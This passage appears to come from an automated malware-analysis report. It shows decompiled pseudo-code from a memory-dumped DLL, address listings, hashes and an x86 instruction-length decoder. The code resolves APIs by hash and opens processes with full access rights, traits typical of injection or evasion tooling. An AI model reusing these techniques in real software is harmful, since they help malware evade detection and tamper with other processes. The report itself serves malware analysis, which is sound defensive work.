									if(_t315 == 0x102) {
										L59:
										E6EF4B5C4(_t449 + 0x34);
										E6EF4B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6EF4F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6EF4F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6EF4B5C4(_t449 + 0x34);
										E6EF4B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6EF4CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6EF4C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6EF4F828(_t449 + 0x14, E6EF4F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6EF4F4BC(_t449 + 0x14, E6EF4F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6EF53064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6EF4F828(_t449 + 0x40, E6EF4F4CC(_t449 + 0x3c) + 4);
											 *(E6EF4F4BC(_t449 + 0x40, E6EF4F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6EF4CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6EF4F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6EF4F4BC(_t449 + 0x40, _t431 * 4);
												E6EF48B58( *_t211, E6EF502B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6EF4CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6EF4F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6EF4F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6EF4F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6EF4F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6EF4F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6EF538F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6EF4F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6EF4F828( *(_t449 + 4), E6EF4F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6EF4F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6EF4F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6EF4F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6EF4F4BC(_t322, _t430);
										E6EF538F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6EF4F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6EF4F828(_t322, E6EF4F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6EF4F828( *(_t449 + 4), E6EF4F4CC( *_t449) + 4);
								 *(E6EF4F4BC( *(_t449 + 4), E6EF4F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6EF4F828(_t322, E6EF4F4CC(_t322) + 4);
								 *(E6EF4F4BC(_t322, E6EF4F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6EF4F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6EF53064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6EF4F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6EF4F828( *(_t449 + 4), E6EF4F4CC( *_t449) + 4);
										 *(E6EF4F4BC( *(_t449 + 4), E6EF4F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6EF4F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6EF4F828( *((intOrPtr*)(_t449 + 0x74)), E6EF4F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6EF4F4BC( *((intOrPtr*)(_t449 + 0x74)), E6EF4F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6EF4F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6EF4F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6EF4F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6EF4F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6EF4F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6EF4F4BC(_t430, _t443);
										E6EF538F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6EF4F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6EF4F828(_t430, E6EF4F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6EF53064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6EF4F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6EF4F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6EF4F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6EF4F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6EF4F4BC( *(_t449 + 4), _t445);
										E6EF538F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6EF4F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6EF4F828( *(_t449 + 4), E6EF4F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6EF4F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6ef48435
0x6ef4843b
0x6ef4843f
0x6ef48443
0x6ef4844e
0x6ef48452
0x6ef48457
0x6ef4845f
0x6ef4846f
0x00000000
0x6ef48471
0x6ef48479
0x6ef48480
0x6ef48480
0x6ef489d3
0x6ef489d5
0x6ef48a16
0x6ef48a18
0x6ef48a27
0x6ef48a33
0x6ef48a33
0x6ef48a22
0x6ef48a39
0x6ef48a3e
0x00000000
0x6ef48a3e
0x6ef48a26
0x00000000
0x6ef4848a
0x6ef4848e
0x6ef48491
0x6ef48599
0x6ef48599
0x6ef4859e
0x6ef486c1
0x6ef486c5
0x6ef486ca
0x6ef486ce
0x6ef486d2
0x6ef48808
0x6ef4880a
0x6ef4880e
0x6ef48817
0x6ef48822
0x6ef48826
0x6ef4882f
0x6ef48834
0x6ef4883a
0x6ef4883b
0x6ef4883f
0x6ef48843
0x6ef4884a
0x6ef4884c
0x6ef4898c
0x6ef4899d
0x6ef489a4
0x6ef489ab
0x6ef489ab
0x6ef489ae
0x6ef489b1
0x6ef489b4
0x6ef489ba
0x6ef489c1
0x6ef489c5
0x6ef489ce
0x00000000
0x6ef489ce
0x6ef489bc
0x6ef489bf
0x6ef489d8
0x6ef489f0
0x6ef489f3
0x6ef489f8
0x6ef48a02
0x6ef48a05
0x6ef48a08
0x6ef48a11
0x00000000
0x6ef48a11
0x00000000
0x6ef489bf
0x6ef48854
0x6ef48854
0x6ef48856
0x6ef4885a
0x6ef4885f
0x6ef48861
0x6ef48865
0x6ef48868
0x6ef48870
0x6ef48872
0x00000000
0x00000000
0x6ef48889
0x6ef488a4
0x6ef488a6
0x6ef488b4
0x6ef488b9
0x6ef488bb
0x6ef488d8
0x6ef488d8
0x6ef488dc
0x6ef488de
0x00000000
0x00000000
0x6ef488e0
0x6ef488e3
0x6ef48904
0x6ef48923
0x6ef48929
0x6ef4892c
0x6ef48931
0x6ef48932
0x6ef48939
0x00000000
0x00000000
0x6ef48941
0x6ef48941
0x6ef48943
0x6ef4894f
0x6ef4895b
0x6ef4897d
0x6ef48982
0x6ef48983
0x6ef48983
0x00000000
0x6ef48943
0x00000000
0x6ef488e3
0x6ef488bd
0x6ef488c3
0x6ef488c5
0x6ef488c6
0x6ef488c7
0x6ef488c8
0x6ef488cc
0x6ef488d0
0x6ef488d2
0x6ef488d3
0x6ef488d4
0x6ef488d6
0x00000000
0x00000000
0x00000000
0x6ef488d6
0x6ef488e9
0x00000000
0x6ef488e9
0x6ef486d8
0x6ef486da
0x6ef486dc
0x00000000
0x00000000
0x6ef486e6
0x6ef486e6
0x6ef486e8
0x6ef486eb
0x6ef486ed
0x6ef486f5
0x6ef486fc
0x6ef48700
0x6ef48703
0x00000000
0x00000000
0x6ef487ff
0x6ef48800
0x6ef48802
0x00000000
0x00000000
0x00000000
0x6ef48802
0x6ef48709
0x6ef4870c
0x6ef48715
0x6ef4871a
0x6ef4871c
0x6ef48728
0x6ef4872c
0x6ef48731
0x6ef48735
0x6ef48b12
0x6ef48b26
0x6ef48b48
0x6ef48b4d
0x6ef48b4d
0x6ef4874b
0x6ef48750
0x6ef48754
0x6ef48754
0x6ef48754
0x6ef48754
0x6ef48759
0x6ef4875e
0x6ef48760
0x6ef48764
0x6ef4876b
0x6ef48770
0x6ef48772
0x6ef48ad3
0x6ef48ae2
0x6ef48afb
0x6ef48b00
0x6ef48b00
0x6ef48785
0x6ef4878a
0x6ef4878e
0x6ef4878e
0x6ef4878e
0x6ef487a0
0x6ef487c1
0x6ef487c9
0x6ef487d7
0x6ef487f5
0x6ef487fb
0x6ef487fb
0x00000000
0x6ef4870c
0x6ef485a4
0x6ef485a4
0x6ef485a6
0x6ef485ad
0x6ef485bb
0x6ef485bd
0x6ef485c1
0x6ef485c3
0x6ef485c5
0x6ef48600
0x6ef4860f
0x6ef48611
0x6ef48613
0x6ef48631
0x6ef48633
0x6ef48635
0x6ef48647
0x6ef48665
0x6ef4866e
0x6ef48671
0x6ef4867f
0x6ef48690
0x6ef486ae
0x6ef486b0
0x6ef486b4
0x6ef486b4
0x6ef486b4
0x6ef48635
0x00000000
0x6ef48613
0x6ef485cb
0x6ef485cb
0x6ef485d0
0x6ef485d7
0x6ef485e6
0x6ef485ed
0x6ef485ef
0x00000000
0x00000000
0x6ef485fb
0x6ef485fc
0x6ef485fe
0x00000000
0x00000000
0x00000000
0x6ef485fe
0x6ef485f1
0x6ef485f4
0x00000000
0x00000000
0x6ef486b6
0x6ef486b6
0x6ef486b7
0x6ef486b7
0x00000000
0x6ef48497
0x6ef48497
0x6ef48497
0x6ef48499
0x6ef484a0
0x6ef484ae
0x6ef484b0
0x6ef484b4
0x6ef484b6
0x6ef484e2
0x6ef484e6
0x6ef484eb
0x6ef484f0
0x6ef484f4
0x6ef484f8
0x6ef484ff
0x6ef48504
0x6ef48506
0x6ef48a95
0x6ef48aa4
0x6ef48ac3
0x6ef48ac8
0x6ef48ac8
0x6ef48519
0x6ef4851e
0x6ef48522
0x6ef48522
0x6ef48522
0x6ef48533
0x6ef48535
0x6ef48537
0x6ef48548
0x6ef48548
0x6ef4854d
0x6ef48552
0x6ef48556
0x6ef4855b
0x6ef48562
0x6ef48567
0x6ef48569
0x6ef48a57
0x6ef48a63
0x6ef48a7d
0x6ef48a82
0x6ef48a82
0x6ef4857f
0x6ef48584
0x6ef48588
0x6ef48588
0x6ef48588
0x6ef48588
0x6ef4858b
0x6ef4858b
0x00000000
0x6ef4858b
0x6ef484ba
0x6ef484ba
0x6ef484bc
0x6ef484c8
0x6ef484cf
0x6ef484d1
0x00000000
0x00000000
0x6ef484dd
0x6ef484de
0x6ef484e0
0x00000000
0x00000000
0x00000000
0x6ef484e0
0x6ef484d3
0x6ef484d6
0x00000000
0x00000000
0x6ef4858c
0x6ef48590
0x6ef48591
0x6ef48591
0x00000000
0x6ef48499
0x6ef48491

Strings

, xrefs: 6EF48A1A

Memory Dump Source

Source File: 00000000.00000002.774989941.000000006EF41000.00000020.00020000.sdmp, Offset: 6EF40000, based on PE: true

Associated: 00000000.00000002.774954751.000000006EF40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775083639.000000006EF5A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775126226.000000006EF5D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775144932.000000006EF5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e83c4d578512a760747fe0338953edde6ec68eceeb8a9fc5cbb5ea94e80d035d
Instruction ID: 858c1caaff2d61bdda510cd2bcb9dc07b5648031a450bfb53de0d101db17bd44
Opcode Fuzzy Hash: e83c4d578512a760747fe0338953edde6ec68eceeb8a9fc5cbb5ea94e80d035d
Instruction Fuzzy Hash: D4126372104349DFC754DFA4C8A0AAE7BE9EF85714F109D2EE559872A2DF349D04CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6EF59370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6EF59370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6EF53698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
